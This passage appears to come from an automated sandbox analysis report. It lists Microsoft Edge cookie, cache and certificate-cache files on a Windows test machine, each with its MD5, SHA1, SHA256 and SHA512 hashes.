SHA256 12452f2275127a8f665865a2c1b0d1919bee4961bbed1850c4df48b1fa07772b
SHA512 604a4230b75f7b81e480e4234db071780cb6af7b6f0be99579c9917bd85c717f51590955f4bb2e28ec74f25a9ec96a9a31a5d01a713137ef74f0977632668ef1

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\5MIU5IOM.cookie

MD5 1c77db8c77b0d1fa9e6a6c158c1a5853
SHA1 67682ba3c2ea9516d062efec7b3b5ef2c3481ce5
SHA256 242c2c6628577e92fd64665948c635fc0bdfeae10a57c4ed7b0dd449897b8eff
SHA512 78d0df2df815780ec25a196dec78b62b65a40a30aa116f5868c5c62bb41f95da2ea5ebfa669dd6df12bd8ff27220efa5452651d6ded175bcd17fe86ea1597c9c

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\S2XMKKQ4\epic-favicon-96x96[1].png

MD5 c94a0e93b5daa0eec052b89000774086
SHA1 cb4acc8cfedd95353aa8defde0a82b100ab27f72
SHA256 3f51f3fb508f0d0361b722345974969576daef2c7d3db8f97c4ca8e1ff1a1775
SHA512 f676705e63f89d76520637b788f3bac96d177d1be7f9762aeb8d5d1554afd7666cbd6ef22ce08f581eb59bd383dd1971896231264bc3eaabf21135c967930240

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\C1KYNOLH.cookie

MD5 34bf8a107a153e76dd7a921c96cf13c6
SHA1 8b92770fca4cd9f9d3fd23fc4e69d14b7ad8747b
SHA256 2b306b734851c30fe4ae5ca6f7ded1a4d2ffa7c701305b2fe5c6dc713bb577bb
SHA512 0b4f199d509959f1570495c4f50360a199e33c5edb4304d99f5659e0f6d2f17d1b2d806aad02b6fa53f8dad4afc7348938fd27ec3a906393d7fb143660ef7851

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

MD5 1470e06cc42a2111055b93623be7a865
SHA1 d577dc34e053b0c6d7779bdae2409e79fc855594
SHA256 abbc0067fc37a0653e7a8a67dd5d4323881ccf8dd8c467af15dabb4269355769
SHA512 87a7e539ed7e0687cb9c2be8f6b2118d281124614ddc9b7a1baece39f8abe50895991960bbddf6c546cef8ad2a0e2200954df972d660a10cdb59c0bd69fd0e08

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\CFDSNEYV\recaptcha__en[1].js

MD5 fbeedf13eeb71cbe02bc458db14b7539
SHA1 38ce3a321b003e0c89f8b2e00972caa26485a6e0
SHA256 09ed391c987b3b27df5080114e00377ff1a748793cb417a809b33f22d737fe55
SHA512 124b9f53a53ef596a54c6c04ab3be2b25d33d1ce915978ec03da8f9f294db91d41ee9091b722e462722f51f9d9455ce480e1a0cb57c2f3248c7a3a9e3b9dac58

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\User\Default\DOMStore\1A3VB725\www.recaptcha[1].xml

MD5 1a2d941496fe1b3474fc38f3b7391357
SHA1 72e21ce7bfb5fa542a48cbdd9ed5fd009e55970c
SHA256 42224898209b2abdb9c98118e7130c8a43e06345f435abeb172896227e54972f